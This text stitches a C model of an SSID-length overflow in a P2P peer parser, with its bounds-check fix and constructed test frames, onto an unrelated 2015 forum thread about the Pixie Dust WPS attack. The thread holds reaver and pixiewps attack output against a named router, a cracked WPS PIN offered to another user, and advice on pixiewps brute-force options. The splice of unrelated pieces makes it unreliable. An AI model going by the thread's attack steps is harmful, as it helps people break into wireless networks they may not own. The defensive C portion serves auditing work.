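The defect the advisory describes, as a simplified C model I added (not wpa_supplicant's code, and the struct and function names are mine): an 802.11 SSID element carries an 8-bit length, so the copy into a 32-octet field in a heap-allocated peer entry must validate that length first. The "before" behaviour is modelled as a length check that reports whether the unchecked copy would have overrun, so nothing here actually overflows; the fixed path rejects the element and leaves the entry untouched. Both test frames are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SSID_MAX_LEN 32   /* SSID is 0..32 octets, but the element length field is one byte (0..255) */

/* Simplified model of a heap-allocated P2P peer entry (not struct p2p_device itself).
 * Fields after ssid[] are what an unchecked copy would trample, as the advisory notes. */
struct peer_dev {
    uint8_t ssid[SSID_MAX_LEN];
    size_t  ssid_len;
    void   *note;            /* stands in for the pointer that later gets freed */
};

/* Walk a run of information elements (id, len, payload...) and return the SSID element
 * (id 0) or NULL. A truncated element rejects the whole run. */
static const uint8_t *find_ssid_ie(const uint8_t *ies, size_t ie_len)
{
    size_t pos = 0;
    while (pos + 2 <= ie_len) {
        uint8_t id = ies[pos], len = ies[pos + 1];
        if (pos + 2 + len > ie_len)
            return NULL;
        if (id == 0)
            return ies + pos;
        pos += 2 + (size_t)len;
    }
    return NULL;
}

/* Before the fix (modelled, not executed): memcpy(dev->ssid, e + 2, e[1]) trusted e[1].
 * Returns 1 when that copy would have exceeded the 32-byte field. */
int unchecked_copy_would_overflow(const uint8_t *ies, size_t ie_len)
{
    const uint8_t *e = find_ssid_ie(ies, ie_len);
    return e != NULL && e[1] > SSID_MAX_LEN;
}

/* After the fix: validate the element length against the destination before copying.
 * Returns 0 on success, -1 when the frame carries no usable SSID (entry left unchanged). */
int peer_update_ssid(struct peer_dev *dev, const uint8_t *ies, size_t ie_len)
{
    const uint8_t *e = find_ssid_ie(ies, ie_len);
    if (e == NULL || e[1] > SSID_MAX_LEN)
        return -1;
    memcpy(dev->ssid, e + 2, e[1]);
    dev->ssid_len = e[1];
    return 0;
}

/* Constructed IE run: a supported-rates element followed by the 7-octet SSID "example". */
static const uint8_t GOOD_IES[] = {
    0x01, 0x02, 0x82, 0x84,
    0x00, 0x07, 'e', 'x', 'a', 'm', 'p', 'l', 'e'
};

/* Constructed IE run whose SSID element claims 64 octets, i.e. more than the field holds. */
#define BAD_LEN 0x40
static uint8_t BAD_IES[2 + BAD_LEN];
const uint8_t *bad_ies(size_t *len)
{
    BAD_IES[0] = 0x00;
    BAD_IES[1] = BAD_LEN;
    memset(BAD_IES + 2, 'A', BAD_LEN);
    *len = sizeof(BAD_IES);
    return BAD_IES;
}

/* Well-formed frame goes through the hardened path; returns 1 when the SSID was stored. */
int demo_good_frame(void)
{
    struct peer_dev d;
    memset(&d, 0, sizeof d);
    if (peer_update_ssid(&d, GOOD_IES, sizeof GOOD_IES) != 0)
        return 0;
    return d.ssid_len == 7 && memcmp(d.ssid, "example", 7) == 0;
}

/* Over-long frame: the old copy would have overrun, the fixed path rejects it. Returns 1 if so. */
int demo_bad_frame(void)
{
    struct peer_dev d;
    size_t blen;
    const uint8_t *b = bad_ies(&blen);
    memset(&d, 0, sizeof d);
    if (!unchecked_copy_would_overflow(b, blen))
        return 0;
    if (peer_update_ssid(&d, b, blen) != -1)
        return 0;
    return d.ssid_len == 0;   /* entry untouched */
}
```

The same shape of check (element length versus destination size, and element length versus remaining frame bytes) is what to look for when auditing any IE parser, since the length byte is attacker-controlled in every unprotected management frame.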
Where can I get a copy of this firmware everyone is picking apart right now? I've tried to find some Arris firmwares (as some seem to be invulnerable to pixie) but they are apparently very tightly guarded and I do not own one, or I would dump it myself. Definitely no downloads for them, but if I get my hands on one physically... different story :-D
email username @ gmail
http://sourceforge.net/projects/alfa...iles/Firmware/
Alfa AIP-W525H I believe.... not sure if it is v1 or v2 though.
Manufacturer: Greenwave
Device Name: GreenWave BHR4
Model Number: 4
000000000:6F4| 1|-61|1.0|No |FiO00000000| GreenWave| 4|
Greenwave Systems, no wikidevi, fccid
NOT Vulnerable
Last edited by nuroo; 2015-04-30 at 15:47.
Does not work on Technicolor TD5130 V1 and Thomson AP
Worked fine for me when I tested. You need to wait for the whole realtek tool to be released. It is almost done.
Big Teaser !
soxrok2212 I have tried many times on my network but no result
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 18:17:25:xx:xx:xx
[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5e:86:d7:2d:5a:11:c1:36:51:97:d7:16:54:c3:de:7f
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Name: Technicolor TD5
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1343A1D22901
[+] Received M1 message
[P] R-Nonce: c0:68:f8:86:c5:14:c2:aa:d8:5f:56:29:51:0c:fd:d4
[P] PKR: 58:f7:89:a6:11:fc:9e:ad:b1:a5:e5:e8:97:5b:4c:e3:f9:a2:3c:d0:81:70:cf:4f:59:fd:bd:d1:7f:fe:fc:a0:28:64:46:fc:da:31:61:88:65:09:86:66:4b:9f:37:af:68:3b:9e:1f:fd:bd:aa:09:f6:5b:b2:8d:da:e2:cf:cd:c5:5b:8c:87:82:e8:d4:8f:b8:9c:22:8e:ca:c2:ad:c3:43:01:4e:d9:39:0b:ec:a9:12:bd:ba:02:a9:69:30:de:61:6d:da:cd:47:80:9c:d9:39:4d:e3:40:c4:38:13:6d:15:f2:b1:68:9e:e4:45:0b:e9:0b:ba:bb:2e:7b:96:d4:c6:c2:8e:e6:07:8c:fe:35:6d:7a:fd:8c:ca:24:d7:87:b7:b5:fd:8d:32:e7:e6:fa:5d:01:eb:d6:8a:aa:16:89:7a:63:ec:db:e1:60:01:0f:0b:92:90:ba:e0:33:35:57:f5:01:63:36:0e:b1:46:6a:70:99:cf:5c:49:6e:40:3c
[P] AuthKey: f4:8d:63:52:60:ad:82:9e:7e:72:b4:84:82:bb:df:5d:0d:29:76:55:a4:07:57:9f:5a:92:07:17:19:53:42:ac
[+] Sending M2 message
[P] E-Hash1: 99:9f:06:06:d4:39:af:ba:43:40:bc:f3:42:db:04:64:e5:cf:b3:ed:a7:f6:40:a9:f0:d0:eb:df:5c:91:67:79
[P] E-Hash2: 9c:94:a1:72:b8:36:02:47:cd:50:44:d2:2f:fe:49:d8:68:62:b7:de:84:ac:4a:a8:9e:75:a2:24:bf:37:ba:91
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 1 s
[Pixie-Dust]
Try this PIN and let me know if it works: 76734052
I really hope this is your own AP... by using that PIN you agree that I am not responsible for any trouble you may get into.
@aboulatif
Hey just a curiosity of mine... Is the WAN MAC of that router 18:17:25:2C:0B:75?
he forgot to blank out a line, so no wiire.
"[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)"
Model name = model number ...
Example..
RTL8187 >>>> RTL ( Model name) 8187 ( Model number) ...
Other values about modem manufacturer, not wps manufacturer ( 1.0.1.1 , 1 , 1234 )
Old version or invulnerable chipsets are different. They should be well analyzed on Wireshark
Last edited by Saydamination; 2015-04-30 at 22:31. Reason: Ok.
You shouldn't look too much into this. Manufacturers put what they want in those fields. Sometimes they put the valid model number, name, serial or whatever, sometimes they put something else, for example '123456' (or '1234' or whatever), which is like a blank field (I guess they can't put zeroes).
Reaver prints that information only to give you a (sometimes vague) idea of what the chipset brand/model could be. The cracking is performed by pixiewps, which doesn't use this information.
@soxrok2212 here is a cap of the same router type, if you can get me a pin and/or tell me how that would rok ;-)
http://d-h.st/9dE1
Last edited by aanarchyy; 2015-05-01 at 16:35.
Pixiewps 1.1 is out!
See the original thread.
Hey guys, I am a little bit confused as to the usage of -f in the new pixiewps. It refers to mode4??? anyone kind enough to clarify?
just add -f 4
And would you add this argument always?
At first I tried it without that option on a router with a Realtek chipset and it didn't find the pin, then I tried it with -f 4 and it took about 600s, then BOOM pin found
Yes, sorry, I should've clarified. The --force option is used only for what I call mode 4, which is Realtek's PRNG seed bruteforce. I was planning on adding mode selection but I didn't, and I left those modes on the usage screen because I didn't want to explicitly refer to vendors in the program.
The best practice is to run the program without -f and if you get a warning saying that the router might be vulnerable to mode 4, it means that you may want to try again with -f or with another set of data that could lead you to (mode 2) secret nonces = enrollee nonce. I also refer to modes because that's how the program runs internally: it tries every possible vulnerability. When it bruteforces the new PRNG though (that is mode 4), it normally tests only a small window of time (approximately 10 days) because the new bruteforce is more power consuming.
So --force is basically used only if the router has its time set to the past (more than 10 days ago). To exhaust it probably takes 20 - 30 mins. Also -f doesn't take any argument. The program just doesn't complain if you pass it some extra arguments. I gotta fix that.
Also would you mind replying on the pixiewps thread for program related questions? Thanks.
hi wiire can you tell me which command should I use against Realtek chipset?
Hello hanada and welcome to the forum
mmm... Did you read the line just before your message?
Maybe you are not used to forums, but you have to put your question in the correct thread.
Your question is strictly about pixiewps usage and this thread is about the pixie dust breach
You should have asked your question in this thread
By the way...
..., if you read a little you will find the answer to your question... read before asking, that way the forum is not full of duplicated content
@nuroo @aanarchyy I looked for more info on the data you sent me (caps and reaver output). Upon looking at the beacon frames in the cap that aanarchyy sent me, I see that the Greenwave G1100 uses a Broadcom 802.11N/AC chip, more specifically I believe that it may be the BCM4360: https://wikidevi.com/wiki/Broadcom... AFAIK the G1100 is 3x3:3 on 2.4GHz and 3x3:3 on 5GHz. Assuming so, that leads me to the conclusion above. With the lack of documentation, the only way to find out for sure would be to order one and open it up, but FiOS is not available in my area and I don't have $200-$300 to spend on it... I don't even see their firmware available anywhere online...
If I can get my hands on one, I will gladly dump it and share. As of recently, I've been poking around a dump I did the other day of a Belkin F9K1001 v1 ( https://wikidevi.com/wiki/Belkin_F9K1001_v1 ) to see what I can find. Found it at the swap shed of the dump in my town so I had no issues pulling the flash chip off and dumping it. I pick up all kinds of random embedded devices to tinker with. I've got somewhere over a dozen or so assorted routers/repeaters (old Comcast, old Verizon, Belkin, D-Link, Buffalo, Netgear, Linksys, and some random weird ones) I'd be glad to dump/decompress/decompile/share if anyone would find it useful :-) I'm kinda sucky at reading assembly but I'm learning...
Any Comcast /Cisco DPC3939?
@soxrok2212
gave u full dump, no filters. beacons should be in the .cap
No FiOS at my location either. At least you were able to deduce it's a Broadcom chip; never heard of Greenwave before this. Was gonna be impressed if a new company came out of the woodwork with a new chipset all on their own.
@aanarchy
I will try to find out if G1100 can be updated, if firmware is available.
Not sure, I'll check as soon as I get home. I think the only two Comcast ones I have are the old Actiontec ones, not sure of the chipsets but I'll look.
G1100 firmware is not available for public download.
As per the folks @ dslreports, who have the router - new firmware is made available to customers internally thru their network.